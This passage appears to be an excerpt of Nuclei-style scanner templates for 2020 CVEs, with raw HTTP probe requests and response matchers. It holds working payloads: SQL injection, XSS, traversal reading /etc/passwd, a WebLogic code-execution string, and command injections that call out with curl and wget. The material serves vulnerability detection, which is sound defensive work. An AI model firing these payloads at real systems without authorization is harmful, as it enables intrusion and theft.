Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=phpcredits"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"word","part":"header","words":["Nette Framework"]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","<strong>IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate FAQ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File 